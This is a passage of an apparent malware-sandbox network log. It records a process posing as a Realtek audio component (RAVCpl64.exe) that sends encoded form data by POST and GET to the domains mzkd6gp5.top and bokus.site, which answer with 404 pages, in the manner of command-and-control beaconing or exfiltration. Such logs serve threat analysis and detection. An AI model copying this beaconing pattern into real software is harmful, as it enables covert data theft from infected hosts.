2b 79 49 77 6b 36 4e 45 49 61 35 51 6e 2f 42 66 68 44 71 33 36 6f 2b 37 77 75 69 4f 64 30 6a 6f 3d Data Ascii: cOnShP=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDecWtyc7p/kpyWnzF/7OWJGEvHZImbknggyoBh00fEMbvCnimD6YvndNV5ev7bmMErjSYNz1tSlHCBr8uv+XDgjP8qzcj2we+Ygk9Ey1HeorRB6/3WxpL1ZGJ4IYjmIuyU2LpPTSygiGT8G+yIwk6NEIa5Qn/BfhDq36o+7wuiOd0jo=
Jan 9, 2025 08:34:01.250634909 CET	913	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:34:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IqLUQApFeB5fvYw8IUrGISACwZmarTlaIXEitTy87MY%2BzounK%2F0cF6BoW2u953MOYCi33%2BcHB7j3LJA86NK%2F8zKHjgO1G5HumbOjro761x2SIqXEpaaOKVL80Z7m8ZLjOiND"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2be0eedea86d4-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=119272&min_rtt=119272&rtt_var=59636&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=819&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 9, 2025 08:34:01.250648975 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.11.20	49769	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:03.373996973 CET	2578	OUT	POST /3u0p/ HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.mzkd6gp5.top Referer: http://www.mzkd6gp5.top/3u0p/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 35 33 35 33 6d 68 6f 56 48 33 2f 33 35 73 56 62 68 43 46 4e 36 52 41 58 54 70 6a 7a 44 65 55 57 75 48 51 37 37 6f 77 70 31 57 6e 7a 4e 66 37 4c 57 4a 47 5a 76 48 78 4d 6d 62 68 63 67 69 36 6f 42 41 55 30 59 32 30 62 6d 43 6e 69 74 6a 36 62 67 48 64 59 56 35 4f 56 37 62 32 4d 45 72 6a 53 59 4f 72 31 71 44 6c 48 45 42 72 2f 2b 66 2b 4c 55 77 6a 33 38 71 72 4d 6a 32 30 52 2f 75 51 6b 39 6b 43 31 45 6f 63 72 54 68 36 39 77 57 77 32 4c 31 56 4a 4a 34 6b 55 6a 6a 63 55 79 54 71 4c 6f 6f 32 37 6d 6c 44 46 4f 4f 32 47 31 37 51 44 74 66 63 63 55 4b 6b 2b 2f 69 65 41 63 66 48 53 68 73 4c 77 38 52 4c 58 6c 30 76 55 78 6c 33 63 62 79 31 50 53 6b 71 44 72 4b 6b 71 62 43 58 62 6c 61 4a 2f 32 55 32 6a 46 61 43 63 76 33 71 6e 54 43 75 61 58 69 69 68 71 71 51 4f 4a 73 6f 4e 6d 56 35 53 58 45 51 6a 73 61 76 76 44 66 79 32 44 68 4c 4a 59 4a 6c 2f 44 39 61 63 6e 44 62 6d 78 53 44 65 69 72 6e 59 4c 71 33 57 79 68 6a 4a 45 6d 75 34 49 38 32 30 35 67 45 46 31 41 59 [TRUNCATED] Data Ascii: cOnShP=h0wTz0QM+szd5353mhoVH3/35sVbhCFN6RAXTpjzDeUWuHQ77owp1WnzNf7LWJGZvHxMmbhcgi6oBAU0Y20bmCnitj6bgHdYV5OV7b2MErjSYOr1qDlHEBr/+f+LUwj38qrMj20R/uQk9kC1EocrTh69wWw2L1VJJ4kUjjcUyTqLoo27mlDFOO2G17QDtfccUKk+/ieAcfHShsLw8RLXl0vUxl3cby1PSkqDrKkqbCXblaJ/2U2jFaCcv3qnTCuaXiihqqQOJsoNmV5SXEQjsavvDfy2DhLJYJl/D9acnDbmxSDeirnYLq3WyhjJEmu4I8205gEF1AY3Ag5Kkz75E/mEKZjz01eEkFXxojxw0FeKHzJ1V4+ZUcUd4WhaWChZgq4FajJd685UHl+YEXVCbdHd8x6vEraU/inpWqlaWdOxrCRSMHtdn2vcTQAHUqyHTkE1BzBSQbzYwtPJPvLbTJAoMBVFaDvQy/WAgeRlnkW/mkYJmkQmgDzh9i5CFlGT32cTcqgKss25fo4zszhZyoBzKd0fAJEbCRwdyRo+7JlvahzmFHhQB4kG0FlskL9tAQhWfs+5h1UUHP36bT+WbKLjUF3yIFHGBUjCcNh51MBshWtjFQC/gem2ps/AJ7SnwRfryQHVQXmmfILcXp4qYgYNGZY41XVmH+u5plDlO2kZ5APyQc6tntNl2UD1nfOXD59f+bCqKp9Jy950Qhb1Cd05qv0i4Mcpy3XRjkKaCU7+63eEmJjMYWpx2FTIzBZh8YC3Oi2nPPRkeaTWuTr+VM64cmHCt/uzJ34ZuR18nq9HHt3IuWxTA06MuqlP5QTwFPkTEDfsvzViuN4i1rjdpTm3ec1axfUBklphCF3A3XXz09uL2V+9/gxKJXZaVD2MX3HTo7/wJBxnddqzgEsi00VADtBAX+/17I8RjlFYtBBTfVyeVwlP5qxrsay3lk+9J0mINgw8RWgNYY+Dj4qgSrJ585lRJ1YpbM4rhhohgkXpy [TRUNCATED]
Jan 9, 2025 08:34:03.374020100 CET	1289	OUT	Data Raw: 56 71 77 32 32 73 4d 66 6c 4d 35 39 79 41 39 4f 4b 2f 53 52 46 61 37 42 37 57 52 2f 33 30 57 7a 58 67 63 69 6d 76 44 7a 49 71 65 70 35 2f 67 59 68 2b 53 61 2f 61 55 4f 35 70 6c 38 67 68 47 57 51 6b 47 45 4e 4f 63 36 5a 2f 59 33 6b 7a 77 6e 7a 75 Data Ascii: Vqw22sMflM59yA9OK/SRFa7B7WR/30WzXgcimvDzIqep5/gYh+Sa/aUO5pl8ghGWQkGENOc6Z/Y3kzwnzuLP+BQevab1BQL6Wvmcl47ytt7GKrJeTNJpJzYE6UETuJOWsFdwWbFl3nID9aMo0CBS0TKTeDK4KwxIl4j0+KvD0lxrwdVSjpt7Fuu04aOsplYuI5zvlmKj3Ll3NbqhPuNcVEmG8+SdWjMsSaJemQp3ISj3enZcxmO
Jan 9, 2025 08:34:03.374103069 CET	4101	OUT	Data Raw: 52 52 54 51 38 67 52 69 35 4a 57 39 35 6b 75 64 2b 4d 49 7a 33 32 6a 68 42 49 59 67 70 4d 74 72 50 30 6c 47 31 34 6e 38 4f 58 4d 4b 6e 30 67 45 41 45 78 30 4f 72 33 74 58 50 35 41 39 30 39 33 50 55 50 54 50 4b 50 4e 49 65 74 69 54 67 74 75 67 58 Data Ascii: RRTQ8gRi5JW95kud+MIz32jhBIYgpMtrP0lG14n8OXMKn0gEAEx0Or3tXP5A9093PUPTPKPNIetiTgtugXT7osi8CwCAKnMdP0hVQtucOZ7l1yzXWNx5SkJMTzdMwgC7wBYb6aqzOrFaz5H6EyTPSw83Heahpt124vv6WcC9sUzAJim89waXBinnDiIcSiChBHdadCa+CFhwQids5hyIw9yhxt+hUE2f/EbEZ/EA0tuUBM0812d
Jan 9, 2025 08:34:03.918781042 CET	912	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:34:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=btUAmvBfR75ul0kbjnXv5yYOqvfMMCoqjCf6NDHJV5%2BcRwJriw0bIZSG0EFDTWZ4A%2FbHViWAEJ91hbFXE4pU7ioLqt5IZqqc7BysPT2tc58Q0jT0qXTh%2Btzwwez9vmLzJeks"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2be1f7a7f233a-ORD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=119339&min_rtt=119339&rtt_var=59669&sent=5&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7968&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
Jan 9, 2025 08:34:03.918798923 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.11.20	49770	104.21.64.1	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:06.029417038 CET	540	OUT	GET /3u0p/?NvA=qUwPQPTQmTwyizTU&cOnShP=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ= HTTP/1.1 Host: www.mzkd6gp5.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:34:06.564337969 CET	924	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:34:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ETv3hJUDLN4b%2FfgTjNkRGwu5XIwzFIOIdf8yvsTmAVCyp4yMJqlCQZ8dxRJAbpQ9MSJF8BRKqWUW6l9cIIUvTFpH2K6shndda%2FQq0iZQmQmGRY11fgMG%2Bo1D4M0Alb15UFJY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff2be301e896378-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=118629&min_rtt=118629&rtt_var=59314&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=540&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Jan 9, 2025 08:34:06.564348936 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.11.20	49771	199.192.21.169	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:11.753988981 CET	793	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 32 4a 72 77 2f 65 56 54 2f 50 6a 54 68 4b 76 32 56 2b 4e 63 59 49 55 59 64 47 4c 71 62 67 50 74 6b 43 69 39 74 79 38 5a 30 6d 68 73 47 38 32 2b 73 6b 67 6c 79 4d 6f 6f 53 73 6c 36 4f 31 51 61 69 50 4a 63 32 63 70 39 4b 48 5a 4e 6f 46 4e 58 4a 5a 31 35 4c 6c 44 6d 34 43 32 51 5a 4d 48 6b 37 47 50 33 5a 75 6b 55 78 72 4f 6b 49 65 56 30 59 31 32 5a 6a 68 67 67 55 39 6d 46 2b 57 44 56 63 63 4b 44 48 4b 37 36 31 58 72 41 75 4b 76 68 35 7a 6d 70 39 45 39 43 4b 2f 7a 47 75 4e 6c 31 62 56 67 74 66 39 6c 6a 4d 4e 43 68 36 70 66 76 64 49 63 42 76 41 3d 3d Data Ascii: cOnShP=lcXtcPN+FJHJ2Jrw/eVT/PjThKv2V+NcYIUYdGLqbgPtkCi9ty8Z0mhsG82+skglyMooSsl6O1QaiPJc2cp9KHZNoFNXJZ15LlDm4C2QZMHk7GP3ZukUxrOkIeV0Y12ZjhggU9mF+WDVccKDHK761XrAuKvh5zmp9E9CK/zGuNl1bVgtf9ljMNCh6pfvdIcBvA==
Jan 9, 2025 08:34:11.943588018 CET	918	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:34:11 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.11.20	49772	199.192.21.169	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:14.457024097 CET	813	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 72 74 71 41 71 39 73 78 6b 5a 33 6d 68 73 56 38 32 37 69 45 67 79 79 4d 6b 4b 53 6f 6c 36 4f 32 73 61 69 4f 35 63 78 72 64 2b 49 58 5a 50 78 31 4e 56 44 35 31 35 4c 6c 44 6d 34 43 79 32 5a 4d 66 6b 37 57 66 33 66 38 41 62 37 4c 4f 6e 42 2b 56 30 50 46 32 64 6a 68 68 4e 55 38 71 76 2b 51 48 56 63 59 4f 44 48 59 54 31 67 6e 72 47 71 4b 75 4f 34 41 37 45 31 6e 6c 31 62 75 48 69 32 75 78 74 65 44 74 33 43 50 52 48 50 65 65 54 2b 5a 6d 48 66 4b 64 61 79 45 45 61 62 77 41 75 6b 31 72 62 64 49 41 7a 2f 5a 35 7a 51 7a 49 3d Data Ascii: cOnShP=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSrtqAq9sxkZ3mhsV827iEgyyMkKSol6O2saiO5cxrd+IXZPx1NVD515LlDm4Cy2ZMfk7Wf3f8Ab7LOnB+V0PF2djhhNU8qv+QHVcYODHYT1gnrGqKuO4A7E1nl1buHi2uxteDt3CPRHPeeT+ZmHfKdayEEabwAuk1rbdIAz/Z5zQzI=
Jan 9, 2025 08:34:14.647979021 CET	918	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 07:34:14 GMT Server: Apache Content-Length: 774 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.11.20	49773	199.192.21.169	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:34:17.157490969 CET	2578	OUT	POST /qps0/ HTTP/1.1 Host: www.bokus.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.bokus.site Referer: http://www.bokus.site/qps0/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 6a 74 71 31 6d 39 6a 77 6b 5a 32 6d 68 73 57 38 32 41 69 45 67 76 79 4d 38 4f 53 6f 67 42 4f 7a 67 61 6a 6f 74 63 77 5a 31 2b 53 48 5a 50 73 46 4e 57 4a 5a 30 37 4c 6c 7a 69 34 42 61 32 5a 4d 66 6b 37 55 58 33 4a 65 6b 62 30 72 4f 6b 49 65 56 6f 59 31 32 35 6a 6e 49 34 55 38 2f 61 2b 68 37 56 64 34 65 44 46 72 37 31 38 33 72 45 74 4b 75 57 34 41 33 48 31 6e 70 66 62 74 62 59 32 74 68 74 65 6c 30 38 48 64 49 59 52 50 44 66 34 34 47 37 66 4c 70 2b 7a 32 59 66 62 77 67 46 39 41 76 4f 44 2b 41 49 37 4c 5a 37 54 47 42 4f 69 44 34 61 53 4e 4e 4a 43 39 2b 54 54 4c 68 6a 38 4a 34 47 56 4e 32 55 74 75 74 44 38 4b 78 48 4b 52 4e 33 4b 78 45 63 48 62 67 65 69 32 2b 33 62 4c 50 79 50 48 38 50 57 62 4e 4b 46 6c 59 38 30 5a 6f 65 42 42 4e 62 54 77 34 71 68 73 6e 69 53 37 74 38 33 73 41 34 45 6d 50 4a 54 53 31 76 4d 63 58 6a 6a 78 69 72 76 68 38 45 62 6b 72 51 6f 39 71 [TRUNCATED] Data Ascii: cOnShP=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSjtq1m9jwkZ2mhsW82AiEgvyM8OSogBOzgajotcwZ1+SHZPsFNWJZ07Llzi4Ba2ZMfk7UX3Jekb0rOkIeVoY125jnI4U8/a+h7Vd4eDFr7183rEtKuW4A3H1npfbtbY2thtel08HdIYRPDf44G7fLp+z2YfbwgF9AvOD+AI7LZ7TGBOiD4aSNNJC9+TTLhj8J4GVN2UtutD8KxHKRN3KxEcHbgei2+3bLPyPH8PWbNKFlY80ZoeBBNbTw4qhsniS7t83sA4EmPJTS1vMcXjjxirvh8EbkrQo9q5izW026YBV+a0eZTa5Gs4rwJ6Fl0UACMH0Dxw/Mo14s26X9Wvlq2w9L7kbvLEfaA9vELxYMKGHFX9VBnF0Y/rasbCSYe7NGYCzWbjOoOZiSIUgmYCXTUMec7Akv0IObf7p00fvMw084JAUjGjYA3+riLnwkO0kcaDekzygDHv6O5JtKIAq2vGtqYLGoyKLfqyu5E2qxqgOdpw10+X8BiG4OSeZZ1oLHMnCss21407VRW2+xGpvaIiWWuA+OIMeph4TiMETcMgXQtB9WxJvpzaotAi86271PilkISdxdBsBEg8cp69KMK9qghrB66gWLyp6+Ou9PEq8FZt1odZbYyjuFMCqGkPiFI0+j6dzyFt1rcJVPKwN+mPYlbJPwrGG1mh78QBnBXwksRWvX64Evq4akbAxx+K/KxhfjoevXYbLZ/0B2EpcdXh2zfi0Bi+0sRRp7J2YVojieH8H86+fqcIqqH6i0KFGuZ5BJgYuFFqr6XyJfU49ZwNPKfXtBakHFytUH5lZs1rqHtEObtOMAu/zTHMVWVa0ogY+7WI+k0VZq2Rh+I9pjLxOu48XR+sK++jKEcRxCCDzVlZ7Q/Thp7ENniqFFfapUoDeymYvYaumZogC33wF/tqwFvt9BkQDGtGvwVuqohEQ1V+I9ajsgYjpqG8o/a5qVAWY [TRUNCATED]
Jan 9, 2025 08:34:17.157515049 CET	3867	OUT	Data Raw: 4d 79 43 54 37 63 6a 2b 76 6f 5a 63 59 44 49 47 59 42 6d 44 74 63 78 7a 44 70 61 4c 52 71 77 32 43 36 71 30 6a 4a 57 4c 52 5a 32 43 2f 2f 37 2f 79 33 64 39 48 45 77 67 4b 76 73 43 38 6e 68 58 34 67 70 38 6e 55 2f 61 30 5a 62 70 38 73 56 75 76 5a Data Ascii: MyCT7cj+voZcYDIGYBmDtcxzDpaLRqw2C6q0jJWLRZ2C//7/y3d9HEwgKvsC8nhX4gp8nU/a0Zbp8sVuvZH+dtWUzEN8DO+1BURb7tsVVA3kZzAgNVRRHjpLe3sMMykvarpG7rNrUnHxJE5ulapuKsnaiwijaoV6r5XWCsfRfUXnwSVGakGvBhUleIM8tfWzYGbpsedBA+mH2Wf+wae5w5+su0+ZcwFJSS6c988pNKRFY9iFRwi
Jan 9, 2025 08:34:17.157598972 CET	1517	OUT	Data Raw: 45 47 35 79 35 42 59 55 57 4f 74 78 47 59 4d 69 4f 2b 57 6c 71 6d 55 4f 46 38 67 77 47 33 77 59 4b 6f 6a 71 77 64 52 4b 67 51 79 43 5a 38 4d 53 57 58 49 30 36 2f 6c 31 6a 50 4b 46 6f 34 61 6b 76 4d 72 2b 63 31 65 39 76 59 50 4a 43 6e 67 45 71 56 Data Ascii: EG5y5BYUWOtxGYMiO+WlqmUOF8gwG3wYKojqwdRKgQyCZ8MSWXI06/l1jPKFo4akvMr+c1e9vYPJCngEqV/Yn2kBDb8WhGFHbYT+7QT8jE0AXHHX03Z8jOdMEwEPWri7xSFKH9Tn+vNDCnNLcTpIwTrjyZx+VmK7E5SYJzq3CkvgaCfMr6jXtVwwN9IKYvfARfAA/BAOf6JR5Bquv1rwrMp/w/7cKFw1GDeDT+kb1GJS9Q0MgS3
